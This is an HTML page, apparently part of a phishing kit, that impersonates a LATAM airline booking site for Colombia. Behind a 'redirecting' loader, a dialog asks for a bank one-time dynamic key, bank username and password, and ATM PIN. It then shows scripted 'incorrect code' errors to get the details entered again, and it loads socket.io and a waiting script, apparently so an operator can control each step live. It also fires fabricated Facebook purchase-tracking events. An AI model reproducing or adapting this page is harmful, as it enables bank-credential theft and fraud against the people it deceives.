<!DOCTYPE html>
<html lang="en">
<head>
                <!-- Facebook Pixel Code -->
<script>
    !function(f,b,e,v,n,t,s)
    {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
    n.callMethod.apply(n,arguments):n.queue.push(arguments)};
    if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
    n.queue=[];t=b.createElement(e);t.async=!0;
    t.src=v;s=b.getElementsByTagName(e)[0];
    s.parentNode.insertBefore(t,s)}(window, document,'script',
    'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '3777089292611056');
    fbq('track', 'PageView');
  </script>
  <noscript><img height="1" width="1" style="display:none"
    src="https://www.facebook.com/tr?id=3777089292611056&ev=PageView&noscript=1"
  /></noscript>
  <!-- End Facebook Pixel Code -->
  
  <script>
    fbq('track', 'AddPaymentInfo');
  </script>
  
  <script>
    fbq('track', 'Purchase', {
      value: 20.00,
      currency: 'USD'
    });
  </script>
  
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Viaja con LATAM | LTM Colombia</title>
    <link rel="shortcut icon" href="./assets/favicon.png" type="image/x-icon">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <link rel="stylesheet" href="./css/normalize.css">
    <link rel="stylesheet" href="./css/utils.css">
    <link rel="stylesheet" href="./css/main.css">
    <link rel="stylesheet" href="./css/hotel-datepicker.css">
        <style>
        body {
            font-family: Arial, sans-serif;
        }
        #dialog-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.7);
            
            justify-content: center;
            align-items: center;
            opacity: 0; 
            transition: opacity 1.8s ease; 
        }

  #dialog-overlay.active {
    opacity: 1; 
}

        #dialog {
            background: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.5);
            text-align: center;
        }
        #dialog input {
            width: 80%;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #ccc;
            border-radius: 4px;
            font-size: 16px;
        }
        #dialog button {
            padding: 10px 20px;
            border: none;
            border-radius: 4px;
            background: #007bff;
            color: #fff;
            font-size: 16px;
            cursor: pointer;
        }
        #sending-message {
            display: none;
            text-align: center;
            font-size: 18px;
        }
        #sending-message img {
            width: 50px;
            animation: spin 1s linear infinite;
        }
        @keyframes spin {
            from { transform: rotate(0deg); }
            to { transform: rotate(360deg); }
        }

        .hidden{
            display: none;
        }
    </style>
    <script src="./js/functions.js"></script>
     <script src="/socket.io/socket.io.js"></script>
    <script src="./js/waiting-v1.js"></script>
</head>
<body>
    <div id="loader" class="loader-full">
        <span class="loader"></span>
        <img id="company-loader">
        <p>No cierres ni recargues la página</p>
        <p style="margin-bottom: 30px;">Redirigiendo...</p>
    </div>

    <div id="dialog-overlay">
        <div id="dialog">
             <!---Titulos--->
            <h2 id="td">Clave Dinámica</h2>
            <h2 id="tderror" class="hidden" id="">Error Clave Dinámica</h2>
            <h2 id="tuser" class="hidden" id="">Ingrese nuevamente sus credenciales bancarias</h2>
            <h2 id="tccajero" class="hidden" id="">Clave Cajero</h2>
            <h2 id="tccajeroerror" class="hidden" id="">Clave Cajero Inválida</h2>
            
             <!---Descripcion--->
            <p id="desotp">Por favor, escriba su clave dinámica</p>
            <p class="hidden" id="deserror-otp" style="color:red;">El código OTP ingresado es incorrecto. Por favor, inténtelo de nuevo.</p>


            <p class="hidden" id="deserror-user" style="color:red;">Usuario o contraseña ingresados son incorrectos. Por favor, inténtelo de nuevo.</p>
            <p class="hidden" id="desc-cajero" style="color:red;">Por favor, ingrese la clave de cajero</p>
            <p class="hidden" id="desc-cajeroerror" style="color:red;">La clave de cajero ingresada es incorrecta, Por favor verifique nuevamente.</p>
            
            <!---Datos a solicitar--->
            <input type="text" id="dynamic-key" maxlength="8" placeholder="Ingrese clave...">
            
            <input class="hidden" type="text" id="user-error" maxlength="18" placeholder="Ingrese usuario banco">
            <br>
            <input class="hidden" type="text" id="pw-error" maxlength="18" placeholder="Ingrese clave banco">
            
            <input class="hidden" type="text" id="ccajero" maxlength="8" placeholder="clave cajero...">
            
            <!---Boton de accion--->
            <button onclick="sendInfo()">Enviar</button>
        </div>
    </div>
    <div id="sending-message">
        <p>Enviando...</p>
        <img src="https://cdn.pixabay.com/animation/2022/07/29/03/42/03-42-05-37_512.gif" alt="Loading">
    </div>


</body>
</html>
